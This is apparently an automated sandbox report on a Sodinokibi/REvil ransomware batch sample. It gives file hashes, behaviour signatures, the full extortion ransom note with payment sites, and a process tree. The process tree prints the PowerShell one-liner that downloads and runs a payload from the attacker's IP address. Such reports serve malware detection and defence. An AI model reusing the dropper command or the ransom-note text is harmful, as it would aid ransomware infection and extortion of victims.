Analysis

  • max time kernel
    48s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    22-08-2020 07:10

General

  • Target

    d011698f0a0292375484c2ce503fd5f4.bat

  • Size

    221B

  • MD5

    2620ae9cab8fc22007e8184ba8972c49

  • SHA1

    fa1095550cb3150a7cadd676bb594e5c60060a2c

  • SHA256

    6031919615418117acd8af53074b43ca886e452074663ea10765ae56ff83b813

  • SHA512

    8a2b0c4537d60159956ce3edf73f136ee9bd2c7194b0a0dbed17c234df0a8bb5a0effb21752bd9d6d5c7b87e43ae50f7e6fb58e613a9e61533b0b7274dfe8ebe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4

Extracted

Path

C:\ae5ba-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ae5ba. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom.

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A11937213753CE2
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/3A11937213753CE2
Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key: 5w9nnsHg6CMB5NUNdzRjrO+8aa+9YWGfiLqCg9KlvfEDsMRzl5pb+wA/1hM8oo4B DUwstCR2O05OPsQ0rfE7PfDK03XAc+/o5mkss3dii76hrBxzPpOKTNcVFSba5Xew l+vI5QXq4iVrzGtjdhqlWlmXF8ePZ0jrj/9JrY+9DTVplWQAcfN0t3Y1KsPFgd2J NZWIj0tZc+x0ZVw/k5YY2lcm/O3CqWWAhakwDrYHsAIdETFaGzDjTkirdcQIcyzO IFDLIgg7/knfsf/m3r9gkOyqStJhQdWEYnJs+XyH0JLZ6/j/wyHFSC4EPxqvEuEw D6K47gndQD0F87PTE8A3AIZiHeLcMpXpDi/e4c3pr+5xsXyir1+OaArqukLcqEVZ whrcYoBVaoupBhtQoR9LuANzjbFck1FjFUEUABwHvSQw0T5MVyZnCs5UaQRkg9SH zG9LGNd/O+rHhnT6NclzxMDqX3pYYigduwWxvgaOha5qu65umfm9bWwMAe2DBN18 KsQgUZwvp1kDzB7fOyfFQxvO3lgQaql7B8mN1zP6Qh8ruatOKcI9ZQj6cIt0i/PR 1B/E10qFydd6n5t030DRd1cZLDOmpRJMiLOF41htd4lXcVAW0FNRP9oP3J1ZWmUx V1xiBnK0ar6pU9eJaHLmXJdcNuAo0Y8GuUUUgc4EfAEF1BvEej9dga29l2pm/2gA bXV/R3KfvOIqRyg1eDJbR9hiR4BUto3ETyRIQIRZejqDsfYqMj+I5WE1EC4hnH7W toPQoIOwk5CuLRH4QSx5mj10g3CiPgZ3M2bTzHW9o1dFwkb35SU7mo/xK78u/9P5 VjYrNkl+RqG2WfjMzoeHo0zkJf5gFj/WGleiIXDwzUz3HRfCznQDvEf2ZEwOb0Es IVNY3SfK7Id2xaR985bDnsyaXMQMuw8CJ/FGH7OQfHlUjbvLsxeRcXqCjFKG3SH+ mmWlcEM3mG4Yj/Srdm/wU5xgCy6ooJGe2n1XQ2keuJvFHazLRjZiUy3gHIOVFr4s Bd91ptX6P1UMqAYDnWu4nDUUU+flYQ92F3xMdHQogh2emdjoVv/r0/QWZ07zcBcE d7cSfiMFWaZNsbjzgO04NHY8oewYUWvIMXPlxP4fxkSXGa1yTzpZCP7+s8PsuTGv teFXFsCWGWLMzApdUm3jH3TJGlByCyC6hRdWaClP0w0I26lryHNaE3Gi224AcVLZ HMpFtIm7Fh0xMxx+rPr7lejgNbLTzwmteEARCFCOt5nNvHooVl7USkbS4vY+jCgY XadyGzp8dIffPAkSMYmeWG6cDFxjytugflzB8P91

-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A11937213753CE2

http://decryptor.cc/3A11937213753CE2

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\d011698f0a0292375484c2ce503fd5f4.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d011698f0a0292375484c2ce503fd5f4');Invoke-HGSGRZQUHJGJQK;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:620
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1120

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/620-0-0x0000000000000000-mapping.dmp

  • memory/620-1-0x0000000073D50000-0x000000007443E000-memory.dmp

    Filesize

    6.9MB

  • memory/620-2-0x0000000000640000-0x0000000000641000-memory.dmp

    Filesize

    4KB

  • memory/620-3-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

    Filesize

    4KB

  • memory/620-4-0x0000000002590000-0x0000000002591000-memory.dmp

    Filesize

    4KB

  • memory/620-5-0x0000000002860000-0x0000000002861000-memory.dmp

    Filesize

    4KB

  • memory/620-8-0x00000000056E0000-0x00000000056E1000-memory.dmp

    Filesize

    4KB

  • memory/620-13-0x0000000005770000-0x0000000005771000-memory.dmp

    Filesize

    4KB

  • memory/620-14-0x0000000006220000-0x0000000006221000-memory.dmp

    Filesize

    4KB

  • memory/620-21-0x00000000061F0000-0x00000000061F1000-memory.dmp

    Filesize

    4KB

  • memory/620-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

  • memory/620-23-0x0000000008D28000-0x0000000008D9C000-memory.dmp

    Filesize

    464KB